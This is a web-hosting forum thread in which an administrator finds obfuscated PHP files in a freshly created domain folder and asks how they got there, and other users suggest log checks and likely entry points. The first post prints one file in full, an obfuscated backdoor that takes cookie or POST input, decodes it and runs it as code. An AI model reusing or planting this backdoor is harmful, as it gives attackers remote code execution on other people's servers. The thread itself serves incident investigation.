Fresh domain with no site all of the sudden infected?

hucon

hucon

Verified User
Joined
Sep 29, 2011
Messages
7
Hi,

One of my customers registered a domain. It got the default landing page of DA. So it has files like the 400.shtml, 401.shtml, index.html, etc.

By accident I went into this folder as I was looking for a file and saw to my big surprise:

total 56
-rwxr-xr-x 1 pl312 pl312 515 Mar 2 15:08 400.shtml
-rwxr-xr-x 1 pl312 pl312 515 Mar 2 15:08 401.shtml
-rwxr-xr-x 1 pl312 pl312 515 Mar 2 15:08 403.shtml
-rwxr-xr-x 1 pl312 pl312 515 Mar 2 15:08 404.shtml
-rwxr-xr-x 1 pl312 pl312 515 Mar 2 15:08 500.shtml
-rw-r--r-- 1 pl312 pl312 2028 Sep 26 2019 7r0bd30k.php
drwxr-xr-x 2 pl312 pl312 4096 Mar 18 13:43 cgi-bin
-rw-r--r-- 1 pl312 pl312 1907 Feb 3 19:41 h84ltod1.php
-rw-r--r-- 1 pl312 pl312 618 Mar 18 13:43 index.html
-rw-r--r-- 1 pl312 pl312 1848 Sep 22 2019 k3vmzbhd.php
-rwxr-xr-x 1 pl312 pl312 8563 Mar 2 15:08 logo.png
-rw-r--r-- 1 pl312 pl312 1884 Oct 30 22:21 tdu94w5j.php


Weird php files which I sometimes find at customers with wordpress sites etc. I was really surprised to find it on this server as it is running mod_security etc and in general has a very restricted execution set.


This domain was registered only a few days ago and the php files are dated from way before that. The content looks like this:

<?php
$npmaub = 'kgtd0\'814Hoscfpx*627rvn9uy3l#b_miea-';$dthdmya = Array();$dthdmya[] = $npmaub[9].$npmaub[16];$dthdmya[] = $npmaub[12].$npmaub[20].$npmaub[33].$npmaub[34].$npmaub[2].$npmaub[33].$npmaub[30].$npmaub[13].$npmaub[24].$npmaub[22].$npmaub[12].$npmaub[2].$npmaub[32].$npmaub[10].$npmaub[22];$dthdmya[] = $npmaub[4].$npmaub[33].$npmaub[12].$npmaub[8].$npmaub[29].$npmaub[26].$npmaub[17].$npmaub[8].$npmaub[35].$npmaub[4].$npmaub[17].$npmaub[4].$npmaub[33].$npmaub[35].$npmaub[8].$npmaub[4].$npmaub[18].$npmaub[26].$npmaub[35].$npmaub[29].$npmaub[33].$npmaub[6].$npmaub[7].$npmaub[35].$npmaub[3].$npmaub[8].$npmaub[7].$npmaub[6].$npmaub[18].$npmaub[4].$npmaub[19].$npmaub[23].$npmaub[7].$npmaub[18].$npmaub[17].$npmaub[19];$dthdmya[] = $npmaub[28];$dthdmya[] = $npmaub[12].$npmaub[10].$npmaub[24].$npmaub[22].$npmaub[2];$dthdmya[] = $npmaub[11].$npmaub[2].$npmaub[20].$npmaub[30].$npmaub[20].$npmaub[33].$npmaub[14].$npmaub[33].$npmaub[34].$npmaub[2];$dthdmya[] = $npmaub[33].$npmaub[15].$npmaub[14].$npmaub[27].$npmaub[10].$npmaub[3].$npmaub[33];$dthdmya[] = $npmaub[11].$npmaub[24].$npmaub[29].$npmaub[11].$npmaub[2].$npmaub[20];$dthdmya[] = $npmaub[34].$npmaub[20].$npmaub[20].$npmaub[34].$npmaub[25].$npmaub[30].$npmaub[31].$npmaub[33].$npmaub[20].$npmaub[1].$npmaub[33];$dthdmya[] = $npmaub[11].$npmaub[2].$npmaub[20].$npmaub[27].$npmaub[33].$npmaub[22];$dthdmya[] = $npmaub[14].$npmaub[34].$npmaub[12].$npmaub[0];foreach ($dthdmya[8]($_COOKIE, $_POST) as $koalh => $afgqr){function sfpnzp($dthdmya, $koalh, $zbwlowy){return $dthdmya[7]($dthdmya[5]($koalh . $dthdmya[2], ($zbwlowy / $dthdmya[9]($koalh)) + 1), 0, $zbwlowy);}function gusssx($dthdmya, $qdqols){return @$dthdmya[10]($dthdmya[0], $qdqols);}function dwwvtoy($dthdmya, $qdqols){$amqnmff = $dthdmya[4]($qdqols) % 3;if (!$amqnmff) {$ehcrak = $dthdmya[1]; $umhscb = $ehcrak("", $qdqols[1]($qdqols[2]));$umhscb();exit();}}$afgqr = gusssx($dthdmya, $afgqr);dwwvtoy($dthdmya, $dthdmya[6]($dthdmya[3], $afgqr ^ sfpnzp($dthdmya, $koalh, $dthdmya[9]($afgqr))));}

For the rest I cannot find anything that seems out of the ordinary, but I'm wondering how these files even got there? I find it highly unlikely my customer put them there. I also cannot find in any logs something that looks like a transfer of some kind that contains one of these files.

Also maybe still interesting fact. This domain is redirected to another one. Has .htaccess file with Redirect 301 / http://<url>

Does anybody have an idea where to start and how to block this? Thanks in advance for helping!
 
Last edited:
File: `7r0bd30k.php'
Size: 1648 Blocks: 8 IO Block: 4096 regular file
Device: fd00h/64768d Inode: 1684780 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 541/ pl312) Gid: ( 542/ pl312)
Access: 2020-04-23 13:11:47.684100724 +0200
Modify: 2018-06-12 00:43:10.000000000 +0200
Change: 2018-06-25 17:34:09.789452078 +0200

The dates in 2018 are impossible as this directory didn't even exist up to a week ago...
 
ok, maybe date was modified, or simple old file was copied (not created) find another files with part of content of this, check logs who ask for it, maybe POST requests etc, then check logs for this IPs etc.
 
Maybe the files where already there in your "default" directory of your server (domains - default map in your root of the hosting server domain)
 
Nope. Default is and was clean. I wonder how it would have worked to get those files there. The site runs in its own user. Only the default index.html was there. It doesn’t have a form or anything that allows POST.... I thought that with Wordpress etc forms etc were abused to get such stuff there but here is only was only a html.
 
It can be done from another site if basedir restrictions are not in effect.
Another possibility is a weak password which was fastly hacked.
It's also possible that the customer has an infected computer and passwords send to hij were captched by malware an send to a hacker.

You really have to check the logs (like ftp and domain logs at least) like Zhenyapan also said, to see how the files got in there.
 
Is there another site on the same DA user? Because a .php file in 1 site can put a file on another site within the same user.
 
Hi guys, it actually happened to a user that has only 1 domain. I have had these issues before and have introduced things as following strict rules for wordpress hardening, installed modsecurity and configured it rather strict. That helped a lot. I was however really surprised to see that site getting infected just like that. There was just an index.html nothing else. And still it got there somehow. I have dug though the logs and can seriously not find anything that points me into a direction. Have increased log level a little now. Maybe I'll notice something now if it happens again.
 
You must log in or register to reply here.
Back
Top